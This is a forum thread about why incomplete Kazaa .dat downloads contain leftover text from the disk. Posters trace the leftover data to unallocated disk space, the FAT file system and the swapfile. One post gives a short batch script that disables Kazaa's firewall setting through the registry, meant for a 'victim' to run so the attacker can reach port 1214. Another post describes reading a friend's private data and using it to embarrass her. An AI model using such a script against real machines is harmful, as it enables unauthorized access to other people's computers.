Kazaa exploit

I copied the .dat (partial mp3 dowloads) files from a friends kazaa shared folder to finish them on my computer (much faster connection). Poking around inside them I found text scaps from all over her os, mainly html from tmp inet files. I promptly posted some links back to her and embarassed her real good :lildevil: I then decided to start a few of my own kazaa downloads to see what showed up. In one .dat --> .mp3 file I found almost complete configuation settings for my browser (MyIE2) that are stored in .ini files, includeing formdata.ini!

Are .dat files large or are they small, because say they were small people with cable could download videos and then put the small .dat file somewhere so 56k users could download easier.

cool. thanx for the info, i'll check out my crap too lol :)

Okay just a few things here. 1 the .dat file size depends on the file you are downloading. Kazaa uses the.dat fil extension as kind of a temporary designation. 2 what are you using to "poke around inside them? im am just curiopus so that i can take a look and verify this for my self. Nothing personal but its sounds kinda funny. Im not sure how a partial mp3 can contain .html files from another users computer. I am interested in finding out more about this.

I think this can be right because once I downloaded 2 songs and I didnt like one of them so I deleted that one and started another download for a different song. In the middle of the download I played the new song and some of the old song was still there. So like half on the new .mp3 had the old song and half had the new song. But finally when the download of the new song was complete there was no old song in it. I wonder what's up with that!?

Hmm never thought of doing that. Great now I have something new to toy around with on my computer thanks for the info on that :)

ZombieMan - notepad will read most .dat files.

i tried it in notepad before i posted :) and didnt find any usefull tidbits inside any .dats. maybe im doing it wrong.

Yes I'm using a simple text editor (not notepad). Various program will even cull out everything but the ascii text for you. Text scaps seems to be more prevalent with unfinished mp3's than anything else. I have previously noticed when viewing an unfinished movie an unrelated movie downloaded earlier sometimes plays a few frames at the end. The size of the .dat files is partially dependant on how quick you pause the download after starting it. Kazaa seems to have a minimum file chunk of 100kb (at least in my samples) even if you haven't actually downloaded that much yet. That probably explains why it is happening since any deleted file/s contained in that space will once again be designated as being part of a particular file. A little more forensics could reveal a lot more. A few attempts with other file types revealed no text, but out of six mp3's they all had at some recognizable text from other files.
Gravity, the .dat files and the movie files are the exact same file. Kazaa simply gives them a .dat extension until the download is finished. that wouldn't be any help to the dialup users. I downloaded for my friend then physically carried the files back to her computer when finished. USB memory is pretty cool.

wack, ive just always used notepad to read .dat

edit >> or you could just boot up in linux, mount your windows partition, and read it in any text editor.

In the olg Kazaa ver', u jast need to write: Http://IP:1214
(IP=IP that the Poet 1214 open)

and in New Kazaa Ver', u need that the Victim run this Exploit:

The exploit: (*.bat)

echo off
reg add HKEY_LOCAL_MACHINE\SOFTWARE\KaZaA\ -/v FirewallStatus /d 0

and after the Victim run this, u need to enter:
Http://IP:1214


bye.

WOW, that was possibly the most irrelevant thing i have ever seen!

I would think that this info you are finding is left over data that used to be in the place of the .dat file, left overs from previously downloaded files and files that have been moved. Kazaa probably reserves the space for the .dat file and doesnt overwrite whats on that portion of the hd but rather leaves it there and the .dat file functions as a way to view this information.

Perhaps this could be a form of data recovery if fully researched and what not.

Kazaa lite came with this little program call dat_veiw

.DAT file manager & viewer v0.6
for .dat (incomplete) files from Kazaa, imesh, grokster

I search google and this is the link it gave me so you can download it

http://www.angelfire.com/ego2/idlelo...s/dat_view.htm

i would say that DS is most likely right. You are not seeing information from the other persons computer. You are seeing information from your own computer. Especially if there is a minimum 100kb size. Then if you only dl 50 kb, you have another 50 kb left over, because the file size is going to be 100kb. Instead of overwriting whatever is on your HD, it is just reading what is there from the file that was in that position on the hard drive before... in case you don't know or you forgot, when you delete a file, it doesn't change the hard drive, it just removes the file from the file allocation table, so all the data is still on your disk, you just can't see it anymore (unless you use some type of forensic software)

Yes the text scaps are definately from the computer kazaa originally downloaded to, not any remote machine. I downloaded the .dat files from another machine which is how I got info in the dat's from her machine. The problem is that these dat files are by design in the kazaa shared folder although they aren't by default accessible remotely. Considering the types of text I'm seeing I'm thinking there source is the windows swapfile (Win386.swp). Otherwise it shouldn't have been able to recover some of the things it did from my machine. I considering writting an app to try to emulate the behavior.

Quote:

---

Originally posted here by Darksnake
I would think that this info you are finding is left over data that used to be in the place of the .dat file, left overs from previously downloaded files and files that have been moved. Kazaa probably reserves the space for the .dat file and doesnt overwrite whats on that portion of the hd but rather leaves it there and the .dat file functions as a way to view this information.

Perhaps this could be a form of data recovery if fully researched and what not.

---

I'm assuming these strange bits of data are being seen of FAT file systems.

IIRC if an entry in the FAT is made for a file of say 10K, but only 2K is written to then the remaining 8K will contain what used to be on the area of the disk that the FAT table is pointing to. If it's a brand new hard drive, you'll probably not see anything. If not it's likely to contain information you've recently deleted or changed. In this way the people viewing this will seem to experience information that is both relevant and timely.

I guess when Kazza begins a download it knows how big the file is going to be to begin with, and reserves the correct amount of space in the FAT and then starts overwriting what was left on the hard drive as it goes along.

Yes this could be a form of data recovery, and it is used by many forms of commercial undelete applications, but often you have to tell them where on the dard drive to start looking. Personally I've never found it very useful.

Did everyone forget that Kazaa is one of the worst spyware applications out there?

Of course we diddn't forget "roadclosed"....but how does it apply here? Please explain further....I'm guessing you have a theory about how this ties into spyware?

I can't actually comment on technical details because I don’t have Kazaa. I have almost downloaded Kazaa so I can see what the .dat files look like for fun, it's interesting reading the thread. I don't have a pc right now that I consider a low enough risk (based on my paranoia level) to put Kazaa on since you can basically rape someone's pc with Kazaa related exploits. Don't undermine the fact that Kazaa is a server that is part of a super node of computers. Kazaa authors didn't exactly take all their resources and apply it toward the security model. They are more in tune with tweaking Kazaa for the purpose it was written and why no one should be surprised that personal data is found in the application. Its sole purpose of revenue is to collect data and pass it on to Cydoor and BDE (there are others but those are the main ones) who make another connection to their own marketing servers and store additional cashes of you information on your PC. Kazaa makes its money by passing your habits and demographics to these guys. Kazza lite works by eliminating these dependencies and tricking the application to think it's connecting to Cydoor etc. I was just thinking, it's spy ware so data has to be stored. And a logical place is a .dat file that Kazza uses to keep track of file parts and who the download source is….and apparently your last 10 websites. :eek:

The disussion of EXACTLY how and where it does that is interesting.

Kazaa lite removes the spyware that is in Kazaa. You get the same results with Kazaa Lite. It isn't a spyware feature, its simply creating a file that is referencing part of a drive, but not writing anything to that area. It could easilly fill that area with 1's and change what you see when you look at the file, but that would be more work.

i am a windows user and i use notepad to open up .dat files and i have no problems, but then again, all of the .dat files that i read are pretty small (50 characters max). BTW-Kimeramon thats just Kazaa's mistake because it stores the song you were listenning in memory (not sure what part), then when you "kill" the download, the part of the song that is downloaded still is in your memory until it is over written by another song. It is bad programming on their part...